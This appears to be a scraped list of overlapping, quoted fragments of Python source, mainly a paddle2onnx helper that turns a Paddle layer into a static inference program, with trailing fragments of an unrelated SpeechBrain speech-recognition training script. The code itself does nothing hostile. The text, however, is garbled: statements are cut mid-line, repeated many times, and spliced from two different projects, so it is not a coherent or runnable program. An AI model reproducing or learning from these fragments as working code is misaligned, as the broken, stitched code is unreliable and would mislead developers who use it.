InputSpec raise ValueError(name_none_error % spec) elif spec.name not in input_var_names: #", "Tensor \" \\ \"in configs.output_spec is the output tensor of \" \\ \"Layer.forward", "the program contains auc op all_ops = main_program.global_block().ops for op in all_ops: #", "is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF", "sure the name of InputSpec or example Tensor \" \\ \"in input_spec is", "= main_program.global_block().ops for op in all_ops: # clear device of Op device_attr_name =", "contains auc op all_ops = main_program.global_block().ops for op in all_ops: # clear device", "== \"fetch\": need_to_remove_op_index.append(i) for index in need_to_remove_op_index[::-1]: global_block._remove_op(index) main_program.desc.flush() main_program = main_program._prune_with_input( feeded_var_names=feeded_var_names,", "= dict() functions = dir(inner_layer) for attr_func in functions: static_func = getattr(inner_layer, attr_func,", "auc op all_ops = main_program.global_block().ops for op in all_ops: # clear device of", "paddle2onnx should be 'Layer', but received input type is %s.\" % type(layer)) if", "if isinstance(target_vars, Variable): target_vars = [target_vars] elif export_for_deployment: if not (bool(target_vars) and all(isinstance(var,", "= main_program.clone() main_program = main_program.clone() global_block = main_program.global_block() need_to_remove_op_index = [] for i,", "\"Please make sure the name of InputSpec or example Tensor \" \\ \"in", "static_forward.concrete_program # the input_spec has been used in declarative, which is equal to", "name_no_exists_error = \"The tensor `%s` does not exists. \" \\ \"Please make sure", "None: # no prune return input_var_names else: # fileter out non-tensor type spec", "output_vars_dict: warnings.warn(name_no_exists_error % var.name) else: for var in output_spec: if var.name not in", "from paddle.fluid.framework import Block, ParamBase, Program, Variable, Parameter, program_guard from paddle.fluid.dygraph.layers import Layer", "prog_translator.enable_to_static: raise RuntimeError( \"The Paddle2onnx doesn't work when setting ProgramTranslator.enable to False.\" )", "input_var_names: warnings.warn(name_no_exists_error % spec.name) else: # do nothing pass else: # prune for", "inner_input_spec = None else: continue input_var_names = _get_input_var_names(concrete_program.inputs, inner_input_spec) # NOTE(chenweihang): [ Get", "variables ] # the rule is like [ Get input variables name ].", "of InputSpec in \" \\ \"`to_static` decorated on the Layer.forward method.\" result_list =", "in input_spec: if spec.name is None: warnings.warn(name_none_error % spec) elif spec.name not in", "name of example Tensor \" \\ \"in configs.output_spec is the output tensor of", "when setting ProgramTranslator.enable to False.\" ) if not isinstance(layer, Layer): raise TypeError( \"The", "\"in input_spec is the same as the name of InputSpec in \" \\", "inner_input_spec = None if input_spec is not None: for attr_func in dir(inner_layer): static_func", "main_program.clone() main_program = main_program.clone() global_block = main_program.global_block() need_to_remove_op_index = [] for i, op", "should be packed with same structure # as original input_spec here. if inner_input_spec:", "result_list.append(spec.name) return result_list def _get_output_vars(outputs, output_spec): name_no_exists_error = \"The tensor `%s` does not", "in \" \\ \"`to_static` decorated on the Layer.forward method.\" result_list = [] input_var_names", "# name is None, the input_spec only can be InputSpec raise ValueError(name_none_error %", "from paddle.fluid.dygraph.dygraph_to_static.program_translator import ProgramTranslator, StaticFunction from paddle.fluid.layers.utils import flatten, pack_sequence_as from collections import", "the output tensor of \" \\ \"Layer.forward method.\" result_list = [] output_vars_dict =", "return result_list @dygraph.base.switch_to_static_graph def get_program(layer, input_spec, output_spec, **configs): paddle.jit.set_verbosity(0) prog_translator = ProgramTranslator() if", "NOTE(Aurelius84): Support non-Tensor type in `input_spec`. inner_input_spec.append(var) extra_var_info = dict() functions = dir(inner_layer)", "for var in flatten(inputs) if isinstance(var, Variable) ] if input_spec is None: #", "with the License. # You may obtain a copy of the License at", "original input_spec here. if inner_input_spec: inner_input_spec = pack_sequence_as(input_spec, inner_input_spec) static_forward = declarative( inner_layer.forward,", "input_var_names target_vars = output_vars main_program = concrete_program.main_program.clone() export_for_deployment = True if isinstance(feeded_var_names, six.string_types):", "NOTE(chenweihang): [ Get output variables ] # the rule is like [ Get", "doesn't work when setting ProgramTranslator.enable to False.\" ) if not isinstance(layer, Layer): raise", "is not None: for attr_func in dir(inner_layer): static_func = getattr(inner_layer, attr_func, None) if", "inner_input_spec) elif 'forward' == attr_func: # transform in jit.save, if input_spec is incomplete,", "if isinstance(spec, paddle.static.InputSpec) ] if len(input_spec) == len(input_var_names): # no prune result_list =", "= static_forward.concrete_program # the input_spec has been used in declarative, which is equal", "input_spec is None: # no prune return input_var_names else: # fileter out non-tensor", "\\ \"Please make sure the name of InputSpec or example Tensor \" \\", "import OrderedDict from paddle.fluid import dygraph from paddle.fluid.dygraph.jit import declarative from paddle.fluid import", "declarative will throw error # inner_input_spec is list[InputSpec], it should be packed with", "input_spec and jit.save without input_spec, # avoid needless warning inner_input_spec = None else:", "def get_program(layer, input_spec, output_spec, **configs): paddle.jit.set_verbosity(0) prog_translator = ProgramTranslator() if not prog_translator.enable_to_static: raise", "var in flatten(outputs): if isinstance(var, Variable): output_vars_dict[var.name] = var if output_spec is None:", "type in `input_spec`. inner_input_spec.append(var) extra_var_info = dict() functions = dir(inner_layer) for attr_func in", "zeros if the program contains auc op all_ops = main_program.global_block().ops for op in", "= [v.name for v in target_vars] for target_v in target_vars: if not main_program.global_block().has_var(target_v.name):", "\\ \"and make sure they are consistent.\" name_no_exists_error = \"The tensor `%s` does", "input_var_names: # the input_spec can be `InputSpec` or `VarBase` raise ValueError(name_no_exists_error % spec.name)", "of example Tensor \" \\ \"in configs.output_spec is the output tensor of \"", "isinstance(spec, paddle.static.InputSpec) ] if len(input_spec) == len(input_var_names): # no prune result_list = input_var_names", "dtype=target_v.dtype, persistable=target_v.persistable) prepend_feed_ops(main_program, feeded_var_names) append_fetch_ops(main_program, fetch_var_names) main_program.desc._set_version() paddle.fluid.core.save_op_version_info(main_program.desc) main_program._copy_dist_param_info_from(origin_program) return main_program, feeded_var_names, target_vars", "[] for var in flatten(input_spec): if isinstance(var, paddle.static.InputSpec): inner_input_spec.append(var) elif isinstance(var, (core.VarBase, core.eager.Tensor,", "and actually, we only need the # var name of output, and we", "prog_translator = ProgramTranslator() if not prog_translator.enable_to_static: raise RuntimeError( \"The Paddle2onnx doesn't work when", "License. from __future__ import absolute_import import os import numpy as np import inspect", "paddle.fluid import layers from paddle.nn import Layer from paddle.fluid.framework import Block, ParamBase, Program,", "[ var.name for var in flatten(inputs) if isinstance(var, Variable) ] if input_spec is", "] if len(input_spec) == len(input_var_names): # no prune result_list = input_var_names # if", "with input_spec and jit.save without input_spec, # avoid needless warning inner_input_spec = None", "the input_spec can be `InputSpec` or `VarBase` raise ValueError(name_no_exists_error % spec.name) else: result_list.append(spec.name)", "exists. \" \\ \"Please make sure the name of example Tensor \" \\", "in feeded_var_names)): raise ValueError(\"'feed_var_names' should be a list of str.\") if isinstance(target_vars, Variable):", "device of Op device_attr_name = core.op_proto_and_checker_maker.kOpDeviceAttrName() op._set_attr(device_attr_name, \"\") if op.type == 'auc': warnings.warn(", "isinstance(name, six.string_types) for name in feeded_var_names)): raise ValueError(\"'feed_var_names' should be a list of", "law or agreed to in writing, software # distributed under the License is", "origin_program = main_program.clone() main_program = main_program.clone() global_block = main_program.global_block() need_to_remove_op_index = [] for", "[ Get input variables name ]. For output var, # we only support", "the License for the specific language governing permissions and # limitations under the", "for var in flatten(input_spec): if isinstance(var, paddle.static.InputSpec): inner_input_spec.append(var) elif isinstance(var, (core.VarBase, core.eager.Tensor, Variable)):", "is %s.\" % type(input_spec)) inner_input_spec = [] for var in flatten(input_spec): if isinstance(var,", "need_to_remove_op_index = [] for i, op in enumerate(global_block.ops): op.desc.set_is_target(False) if op.type == \"feed\"", "'forward' == attr_func: # transform in jit.save, if input_spec is incomplete, declarative will", "flatten, pack_sequence_as from collections import OrderedDict from paddle.fluid import dygraph from paddle.fluid.dygraph.jit import", "which is equal to # @declarative with input_spec and jit.save without input_spec, #", "else: # prune for spec in input_spec: if spec.name is None: # name", "spec.name not in input_var_names: # the input_spec can be `InputSpec` or `VarBase` raise", "and all( isinstance(name, six.string_types) for name in feeded_var_names)): raise ValueError(\"'feed_var_names' should be a", "in enumerate(global_block.ops): op.desc.set_is_target(False) if op.type == \"feed\" or op.type == \"fetch\": need_to_remove_op_index.append(i) for", "on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,", "static_func = getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction) and 'forward' != attr_func: raise", "input_var_names, only raise warning for spec in input_spec: if spec.name is None: warnings.warn(name_none_error", "program_guard(main_program): uniq_target_vars = [] for i, var in enumerate(target_vars): uniq_target_vars.append(var) target_vars = uniq_target_vars", "consistent.\" name_no_exists_error = \"The tensor `%s` does not exists. \" \\ \"Please make", "len(output_vars_dict): result_list = output_vars_dict.values() for var in output_spec: if var.name not in output_vars_dict:", "Paddle2onnx doesn't work when setting ProgramTranslator.enable to False.\" ) if not isinstance(layer, Layer):", "before saving inference model\" ) break with program_guard(main_program): uniq_target_vars = [] for i,", "elif 'forward' == attr_func: # transform in jit.save, if input_spec is incomplete, declarative", "in flatten(input_spec): if isinstance(var, paddle.static.InputSpec): inner_input_spec.append(var) elif isinstance(var, (core.VarBase, core.eager.Tensor, Variable)): inner_input_spec.append( paddle.static.InputSpec.from_tensor(var))", "def _get_input_var_names(inputs, input_spec): name_none_error = \"The %s's name is None. \" \\ \"When", "packed with same structure # as original input_spec here. if inner_input_spec: inner_input_spec =", "static functions other than 'forward' that need to be saved, the input 'input_spec'", "Parameter, program_guard from paddle.fluid.dygraph.layers import Layer from paddle2onnx.utils import logging from paddle2onnx.graph.graph_helper import", "_get_valid_program(main_program) # remind user to set auc_states to zeros if the program contains", "flatten(input_spec): if isinstance(var, paddle.static.InputSpec): inner_input_spec.append(var) elif isinstance(var, (core.VarBase, core.eager.Tensor, Variable)): inner_input_spec.append( paddle.static.InputSpec.from_tensor(var)) else:", "warnings.warn(name_no_exists_error % var.name) else: for var in output_spec: if var.name not in output_vars_dict:", "not (bool(feeded_var_names) and all( isinstance(name, six.string_types) for name in feeded_var_names)): raise ValueError(\"'feed_var_names' should", "warnings.warn(name_none_error % spec) elif spec.name not in input_var_names: warnings.warn(name_no_exists_error % spec.name) else: #", "variables name ]. For output var, # we only support VarBase spec, and", "raise warning for spec in input_spec: if spec.name is None: warnings.warn(name_none_error % spec)", "avoid change user given input_spec inner_input_spec = None if input_spec is not None:", "has been used in declarative, which is equal to # @declarative with input_spec", "return input_var_names else: # fileter out non-tensor type spec infos. input_spec = [", "\"`to_static` decorated on the Layer.forward method.\" result_list = [] input_var_names = [ var.name", "declarative, which is equal to # @declarative with input_spec and jit.save without input_spec,", "% type(layer)) if isinstance(layer, paddle.DataParallel): inner_layer = layer._layers else: inner_layer = layer #", "in compliance with the License. # You may obtain a copy of the", "License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or", "work when setting ProgramTranslator.enable to False.\" ) if not isinstance(layer, Layer): raise TypeError(", "_get_output_vars(outputs, output_spec): name_no_exists_error = \"The tensor `%s` does not exists. \" \\ \"Please", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #", "setting ProgramTranslator.enable to False.\" ) if not isinstance(layer, Layer): raise TypeError( \"The input", "at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed", "for attr_func in dir(inner_layer): static_func = getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction) and", "concrete_program = static_forward.concrete_program # the input_spec has been used in declarative, which is", "op.type == \"feed\" or op.type == \"fetch\": need_to_remove_op_index.append(i) for index in need_to_remove_op_index[::-1]: global_block._remove_op(index)", "spec in input_spec: if spec.name is None: warnings.warn(name_none_error % spec) elif spec.name not", "paddle.fluid.framework import Block, ParamBase, Program, Variable, Parameter, program_guard from paddle.fluid.dygraph.layers import Layer from", "core.eager.Tensor, Variable)): inner_input_spec.append( paddle.static.InputSpec.from_tensor(var)) else: # NOTE(Aurelius84): Support non-Tensor type in `input_spec`. inner_input_spec.append(var)", "if input_spec is None: # no prune return input_var_names else: # fileter out", "See the License for the specific language governing permissions and # limitations under", "`VarBase` raise ValueError(name_no_exists_error % spec.name) else: result_list.append(spec.name) return result_list def _get_output_vars(outputs, output_spec): name_no_exists_error", "concrete_program.main_program.clone() export_for_deployment = True if isinstance(feeded_var_names, six.string_types): feeded_var_names = [feeded_var_names] elif export_for_deployment: if", "\" \\ \"to_static(input_spec=[]) and jit.save(input_spec=[]) \" \\ \"and make sure they are consistent.\"", "BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "and 'forward' != attr_func: raise ValueError( \"If there are static functions other than", "output_spec is not None and len(output_spec) == len(output_vars_dict): result_list = output_vars_dict.values() for var", "paddle.fluid.layers.utils import flatten, pack_sequence_as from collections import OrderedDict from paddle.fluid import dygraph from", "is None, the input_spec only can be InputSpec raise ValueError(name_none_error % spec) elif", "Licensed under the Apache License, Version 2.0 (the \"License\" # you may not", "the name of InputSpec in \" \\ \"`to_static` decorated on the Layer.forward method.\"", "raise ValueError( \"If there are static functions other than 'forward' that need to", "a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required", "0: # TODO(paddle-dev): polish these code blocks if not (bool(feeded_var_names) and all( isinstance(name,", "set the auc states to zeros before saving inference model\" ) break with", "str.\") if isinstance(target_vars, Variable): target_vars = [target_vars] elif export_for_deployment: if not (bool(target_vars) and", "dygraph from paddle.fluid.dygraph.jit import declarative from paddle.fluid import core from paddle.fluid import layers", "True if isinstance(feeded_var_names, six.string_types): feeded_var_names = [feeded_var_names] elif export_for_deployment: if len(feeded_var_names) > 0:", "name is None, the input_spec only can be InputSpec raise ValueError(name_none_error % spec)", "# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in", "export_for_deployment: if not (bool(target_vars) and all(isinstance(var, Variable) for var in target_vars)): raise ValueError(\"'target_vars'", "Layer from paddle2onnx.utils import logging from paddle2onnx.graph.graph_helper import prepend_feed_ops, append_fetch_ops def _get_input_var_names(inputs, input_spec):", "(core.VarBase, core.eager.Tensor, Variable)): inner_input_spec.append( paddle.static.InputSpec.from_tensor(var)) else: # NOTE(Aurelius84): Support non-Tensor type in `input_spec`.", "nothing pass else: # prune for spec in input_spec: if spec.name is None:", "dir(inner_layer) for attr_func in functions: static_func = getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction):", "not exists. \" \\ \"Please make sure the name of InputSpec or example", "output_vars_dict.values() elif output_spec is not None and len(output_spec) == len(output_vars_dict): result_list = output_vars_dict.values()", "only support VarBase spec, and actually, we only need the # var name", "be saved, the input 'input_spec' should be None, but received the type of", "= \"The %s's name is None. \" \\ \"When using jit.save, please set", "the License. from __future__ import absolute_import import os import numpy as np import", "spec.name is None: # name is None, the input_spec only can be InputSpec", "in output_spec: if var.name not in output_vars_dict: raise ValueError(name_no_exists_error % var.name) else: result_list.append(output_vars_dict[var.name])", "result_list def _get_output_vars(outputs, output_spec): name_no_exists_error = \"The tensor `%s` does not exists. \"", "= output_vars_dict.values() elif output_spec is not None and len(output_spec) == len(output_vars_dict): result_list =", "input_spec, output_spec, **configs): paddle.jit.set_verbosity(0) prog_translator = ProgramTranslator() if not prog_translator.enable_to_static: raise RuntimeError( \"The", "are static functions other than 'forward' that need to be saved, the input", "continue input_var_names = _get_input_var_names(concrete_program.inputs, inner_input_spec) # NOTE(chenweihang): [ Get output variables ] #", "for index in need_to_remove_op_index[::-1]: global_block._remove_op(index) main_program.desc.flush() main_program = main_program._prune_with_input( feeded_var_names=feeded_var_names, targets=target_vars) main_program =", "prune result_list = input_var_names # if input spec name not in input_var_names, only", "device_attr_name = core.op_proto_and_checker_maker.kOpDeviceAttrName() op._set_attr(device_attr_name, \"\") if op.type == 'auc': warnings.warn( \"please ensure that", "be 'Layer', but received input type is %s.\" % type(layer)) if isinstance(layer, paddle.DataParallel):", "'list', but received input_spec's type is %s.\" % type(input_spec)) inner_input_spec = [] for", "name of InputSpec in \" \\ \"`to_static` decorated on the Layer.forward method.\" result_list", "from paddle.fluid import core from paddle.fluid import layers from paddle.nn import Layer from", "spec) elif spec.name not in input_var_names: # the input_spec can be `InputSpec` or", "var.name not in output_vars_dict: warnings.warn(name_no_exists_error % var.name) else: for var in output_spec: if", "= \"The tensor `%s` does not exists. \" \\ \"Please make sure the", "var in flatten(input_spec): if isinstance(var, paddle.static.InputSpec): inner_input_spec.append(var) elif isinstance(var, (core.VarBase, core.eager.Tensor, Variable)): inner_input_spec.append(", "import numpy as np import inspect import six import paddle from paddle.fluid.io import", "= dir(inner_layer) for attr_func in functions: static_func = getattr(inner_layer, attr_func, None) if isinstance(static_func,", "input_spec has been used in declarative, which is equal to # @declarative with", "Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the", "for var in flatten(outputs): if isinstance(var, Variable): output_vars_dict[var.name] = var if output_spec is", "but received the type of 'input_spec' is %s.\" % type(input_spec)) if not isinstance(input_spec,", "output_vars_dict: raise ValueError(name_no_exists_error % var.name) else: result_list.append(output_vars_dict[var.name]) return result_list @dygraph.base.switch_to_static_graph def get_program(layer, input_spec,", "type(input_spec)) inner_input_spec = [] for var in flatten(input_spec): if isinstance(var, paddle.static.InputSpec): inner_input_spec.append(var) elif", "core from paddle.fluid import layers from paddle.nn import Layer from paddle.fluid.framework import Block,", "name of output, and we don't recommended to use output_spec output_vars = _get_output_vars(concrete_program.outputs,", "for the specific language governing permissions and # limitations under the License. from", "set InputSepc's name in \" \\ \"to_static(input_spec=[]) and jit.save(input_spec=[]) \" \\ \"and make", "except in compliance with the License. # You may obtain a copy of", "Layer.forward method.\" result_list = [] input_var_names = [ var.name for var in flatten(inputs)", "\" \\ \"When using jit.save, please set InputSepc's name in \" \\ \"to_static(input_spec=[])", "pack_sequence_as(input_spec, inner_input_spec) static_forward = declarative( inner_layer.forward, input_spec=inner_input_spec) concrete_program = static_forward.concrete_program # the input_spec", "ensure that you have set the auc states to zeros before saving inference", "spec in input_spec: if spec.name is None: # name is None, the input_spec", "\"\") if op.type == 'auc': warnings.warn( \"please ensure that you have set the", "have set the auc states to zeros before saving inference model\" ) break", "\"Layer.forward method.\" result_list = [] output_vars_dict = OrderedDict() for var in flatten(outputs): if", "and len(output_spec) == len(output_vars_dict): result_list = output_vars_dict.values() for var in output_spec: if var.name", "len(output_spec) == len(output_vars_dict): result_list = output_vars_dict.values() for var in output_spec: if var.name not", "= [] for var in flatten(input_spec): if isinstance(var, paddle.static.InputSpec): inner_input_spec.append(var) elif isinstance(var, (core.VarBase,", "input 'input_spec' should be None, but received the type of 'input_spec' is %s.\"", "output_spec output_vars = _get_output_vars(concrete_program.outputs, output_spec) feeded_var_names = input_var_names target_vars = output_vars main_program =", "isinstance(target_vars, Variable): target_vars = [target_vars] elif export_for_deployment: if not (bool(target_vars) and all(isinstance(var, Variable)", "to set auc_states to zeros if the program contains auc op all_ops =", "import inspect import six import paddle from paddle.fluid.io import _get_valid_program from paddle.fluid.dygraph.dygraph_to_static.program_translator import", "method.\" result_list = [] input_var_names = [ var.name for var in flatten(inputs) if", "need_to_remove_op_index[::-1]: global_block._remove_op(index) main_program.desc.flush() main_program = main_program._prune_with_input( feeded_var_names=feeded_var_names, targets=target_vars) main_program = main_program._inference_optimize(prune_read_op=True) fetch_var_names =", "% spec) elif spec.name not in input_var_names: warnings.warn(name_no_exists_error % spec.name) else: # do", "not None and len(output_spec) == len(output_vars_dict): result_list = output_vars_dict.values() for var in output_spec:", "getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction) and 'forward' != attr_func: raise ValueError( \"If", "input_spec): name_none_error = \"The %s's name is None. \" \\ \"When using jit.save,", "(the \"License\" # you may not use this file except in compliance with", "# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0", "may not use this file except in compliance with the License. # You", "License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS", "ProgramTranslator() if not prog_translator.enable_to_static: raise RuntimeError( \"The Paddle2onnx doesn't work when setting ProgramTranslator.enable", "declarative( inner_layer.forward, input_spec=inner_input_spec) concrete_program = static_forward.concrete_program # the input_spec has been used in", "if output_spec is None: result_list = output_vars_dict.values() elif output_spec is not None and", "shape=target_v.shape, dtype=target_v.dtype, persistable=target_v.persistable) prepend_feed_ops(main_program, feeded_var_names) append_fetch_ops(main_program, fetch_var_names) main_program.desc._set_version() paddle.fluid.core.save_op_version_info(main_program.desc) main_program._copy_dist_param_info_from(origin_program) return main_program, feeded_var_names,", "op all_ops = main_program.global_block().ops for op in all_ops: # clear device of Op", "in dir(inner_layer): static_func = getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction) and 'forward' !=", "inner_input_spec = pack_sequence_as(input_spec, inner_input_spec) static_forward = declarative( inner_layer.forward, input_spec=inner_input_spec) concrete_program = static_forward.concrete_program #", "isinstance(var, Variable): output_vars_dict[var.name] = var if output_spec is None: result_list = output_vars_dict.values() elif", "in input_var_names: warnings.warn(name_no_exists_error % spec.name) else: # do nothing pass else: # prune", "paddle.nn import Layer from paddle.fluid.framework import Block, ParamBase, Program, Variable, Parameter, program_guard from", "raise ValueError(\"'target_vars' should be a list of Variable.\") main_program = _get_valid_program(main_program) # remind", "functions = dir(inner_layer) for attr_func in functions: static_func = getattr(inner_layer, attr_func, None) if", "inner_input_spec = [] for var in flatten(input_spec): if isinstance(var, paddle.static.InputSpec): inner_input_spec.append(var) elif isinstance(var,", "structure # as original input_spec here. if inner_input_spec: inner_input_spec = pack_sequence_as(input_spec, inner_input_spec) static_forward", "input_spec should be 'list', but received input_spec's type is %s.\" % type(input_spec)) inner_input_spec", "decorated on the Layer.forward method.\" result_list = [] input_var_names = [ var.name for", "import flatten, pack_sequence_as from collections import OrderedDict from paddle.fluid import dygraph from paddle.fluid.dygraph.jit", "= [] output_vars_dict = OrderedDict() for var in flatten(outputs): if isinstance(var, Variable): output_vars_dict[var.name]", "input_spec is the same as the name of InputSpec in \" \\ \"`to_static`", "the input_spec has been used in declarative, which is equal to # @declarative", "Program, Variable, Parameter, program_guard from paddle.fluid.dygraph.layers import Layer from paddle2onnx.utils import logging from", "without input_spec, # avoid needless warning inner_input_spec = None else: continue input_var_names =", "\"Please make sure the name of example Tensor \" \\ \"in configs.output_spec is", "core.op_proto_and_checker_maker.kOpDeviceAttrName() op._set_attr(device_attr_name, \"\") if op.type == 'auc': warnings.warn( \"please ensure that you have", "same as the name of InputSpec in \" \\ \"`to_static` decorated on the", "make sure the name of example Tensor \" \\ \"in configs.output_spec is the", "\"The input of paddle2onnx should be 'Layer', but received input type is %s.\"", "spec) elif spec.name not in input_var_names: warnings.warn(name_no_exists_error % spec.name) else: # do nothing", "warning for spec in input_spec: if spec.name is None: warnings.warn(name_none_error % spec) elif", "name ]. For output var, # we only support VarBase spec, and actually,", "ValueError(name_none_error % spec) elif spec.name not in input_var_names: # the input_spec can be", "target_vars = uniq_target_vars target_var_name_list = [var.name for var in target_vars] origin_program = main_program.clone()", "to zeros if the program contains auc op all_ops = main_program.global_block().ops for op", "getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction): concrete_program = static_func.concrete_program_specify_input_spec( inner_input_spec) elif 'forward' ==", "Variable, Parameter, program_guard from paddle.fluid.dygraph.layers import Layer from paddle2onnx.utils import logging from paddle2onnx.graph.graph_helper", "to be saved, the input 'input_spec' should be None, but received the type", "`input_spec`. inner_input_spec.append(var) extra_var_info = dict() functions = dir(inner_layer) for attr_func in functions: static_func", "to use output_spec output_vars = _get_output_vars(concrete_program.outputs, output_spec) feeded_var_names = input_var_names target_vars = output_vars", "spec, and actually, we only need the # var name of output, and", "# var name of output, and we don't recommended to use output_spec output_vars", "spec.name) else: # do nothing pass else: # prune for spec in input_spec:", "ParamBase, Program, Variable, Parameter, program_guard from paddle.fluid.dygraph.layers import Layer from paddle2onnx.utils import logging", "None, the input_spec only can be InputSpec raise ValueError(name_none_error % spec) elif spec.name", "if inner_input_spec: inner_input_spec = pack_sequence_as(input_spec, inner_input_spec) static_forward = declarative( inner_layer.forward, input_spec=inner_input_spec) concrete_program =", "as the name of InputSpec in \" \\ \"`to_static` decorated on the Layer.forward", "type spec infos. input_spec = [ spec for spec in input_spec if isinstance(spec,", "the auc states to zeros before saving inference model\" ) break with program_guard(main_program):", "should be 'list', but received input_spec's type is %s.\" % type(input_spec)) inner_input_spec =", "from paddle.fluid.dygraph.jit import declarative from paddle.fluid import core from paddle.fluid import layers from", "the Apache License, Version 2.0 (the \"License\" # you may not use this", "# prune for spec in input_spec: if spec.name is None: # name is", "else: result_list.append(spec.name) return result_list def _get_output_vars(outputs, output_spec): name_no_exists_error = \"The tensor `%s` does", "the input_spec only can be InputSpec raise ValueError(name_none_error % spec) elif spec.name not", "inner_layer.forward, input_spec=inner_input_spec) concrete_program = static_forward.concrete_program # the input_spec has been used in declarative,", "with program_guard(main_program): uniq_target_vars = [] for i, var in enumerate(target_vars): uniq_target_vars.append(var) target_vars =", "in output_vars_dict: raise ValueError(name_no_exists_error % var.name) else: result_list.append(output_vars_dict[var.name]) return result_list @dygraph.base.switch_to_static_graph def get_program(layer,", "v in target_vars] for target_v in target_vars: if not main_program.global_block().has_var(target_v.name): main_program.global_block().create_var( name=target_v.name, shape=target_v.shape,", "be packed with same structure # as original input_spec here. if inner_input_spec: inner_input_spec", "distributed under the License is distributed on an \"AS IS\" BASIS, # WITHOUT", "declarative from paddle.fluid import core from paddle.fluid import layers from paddle.nn import Layer", "fileter out non-tensor type spec infos. input_spec = [ spec for spec in", "is the output tensor of \" \\ \"Layer.forward method.\" result_list = [] output_vars_dict", "= ProgramTranslator() if not prog_translator.enable_to_static: raise RuntimeError( \"The Paddle2onnx doesn't work when setting", "= [feeded_var_names] elif export_for_deployment: if len(feeded_var_names) > 0: # TODO(paddle-dev): polish these code", "sure they are consistent.\" name_no_exists_error = \"The tensor `%s` does not exists. \"", "static_forward = declarative( inner_layer.forward, input_spec=inner_input_spec) concrete_program = static_forward.concrete_program # the input_spec has been", "layer # avoid change user given input_spec inner_input_spec = None if input_spec is", "StaticFunction): concrete_program = static_func.concrete_program_specify_input_spec( inner_input_spec) elif 'forward' == attr_func: # transform in jit.save,", "exists. \" \\ \"Please make sure the name of InputSpec or example Tensor", "than 'forward' that need to be saved, the input 'input_spec' should be None,", "not (bool(target_vars) and all(isinstance(var, Variable) for var in target_vars)): raise ValueError(\"'target_vars' should be", "import prepend_feed_ops, append_fetch_ops def _get_input_var_names(inputs, input_spec): name_none_error = \"The %s's name is None.", "there are static functions other than 'forward' that need to be saved, the", "= main_program._inference_optimize(prune_read_op=True) fetch_var_names = [v.name for v in target_vars] for target_v in target_vars:", "`%s` does not exists. \" \\ \"Please make sure the name of InputSpec", "output_vars_dict[var.name] = var if output_spec is None: result_list = output_vars_dict.values() elif output_spec is", "target_vars: if not main_program.global_block().has_var(target_v.name): main_program.global_block().create_var( name=target_v.name, shape=target_v.shape, dtype=target_v.dtype, persistable=target_v.persistable) prepend_feed_ops(main_program, feeded_var_names) append_fetch_ops(main_program, fetch_var_names)", "does not exists. \" \\ \"Please make sure the name of example Tensor", "only raise warning for spec in input_spec: if spec.name is None: warnings.warn(name_none_error %" ]
[ "== sb.Stage.VALID: hyps = None current_epoch = self.hparams.epoch_counter.current if current_epoch % self.hparams.valid_search_interval ==", "fulfills the filtering criteria\"\"\" for key, limit in key_min_value.items(): if computed[key] >= limit:", "epoch.\"\"\" # Compute/store important stats stage_stats = {\"loss\": stage_loss} if stage == sb.Stage.TRAIN:", "self.optimizer.__class__.__name__ else: lr = self.hparams.lr_sgd steps = -1 optimizer = self.optimizer.__class__.__name__ epoch_stats =", "progressbar = not self.noprogressbar # Iterate epochs for epoch in epoch_counter: # Training", "one-step-forward prediction self.acc_metric.append(p_seq, tokens_eos, tokens_eos_lens) return loss , loss_ctc, loss_seq def fit_batch(self, batch):", "in ordering the dataset at batch level. select_n : None, int If not", "train_set = self.make_dataloader( train_set, stage=sb.Stage.TRAIN, **train_loader_kwargs ) if valid_set is not None and", "replacements={\"data_root\": data_folder} ) test_datasets[name] = test_datasets[name].filtered_sorted( sort_key=\"duration\" ) datasets = [train_data, valid_data] +", "self.hparams.compute_features(wavs) current_epoch = self.hparams.epoch_counter.current feats = self.modules.normalize(feats, wav_lens, epoch=current_epoch) if stage == sb.Stage.TRAIN:", "enumerate(shuffled_ids): weights[id] = index return weights def _random_shuffled_batches( self, weights=None, batch_size=8, reverse=False ):", "# recreate dataset using random shuffling return else: # recreate dataset using preferred", "< epoch: # recreate dataset using random shuffling return else: # recreate dataset", "weights=None, batch_size=8 ): \"\"\"Reverse sort the dataset at batch level\"\"\" data_ids = list(weights.keys())", "uses ``clip_grad_norm_`` with this value. Default: ``5``. nonfinite_patience (int) Number of times to", "# if hparams[\"sorting\"] == \"ascending\": # # we sort training data to speed", "if self.debug and self.step == self.debug_batches: break # Write validation summary to tensorboard", "of BPE), training split (e.g, train-clean 100 rather than the full one), and", "asr_brain.evaluate( test_datasets[k], max_key=\"ACC\", test_loader_kwargs=hparams[\"test_dataloader_opts\"], ) # # print(train_data) # train_set = make_dataloader( #", "self.hparams.epoch_counter.current current_optimizer = self.optimizer if current_epoch > self.hparams.stage_one_epochs: del self.optimizer self.optimizer = self.hparams.SGD(self.modules.parameters())", "The reason to implement these operations in the same method is that computing", "overrides) # If distributed_launch=True then # create ddp_group with the right communication protocol", "`make_dataloader()` for making the valid_loader (if valid_set is a Dataset, not DataLoader). E.g.,", "sorting do not shuffle in dataloader ! otherwise is pointless # hparams[\"train_dataloader_opts\"][\"shuffle\"] =", "elif ordering_type == \"sorted\": if weights == None: # Create dataset using ordering", "= batch_size * batch end_index = min((batch_size+1)*batch, len(data_count)) shuffled_data_ids += data_ids[start_index:end_index] assert len(shuffled_data_ids)", "if stage != sb.Stage.TRAIN: self.acc_metric 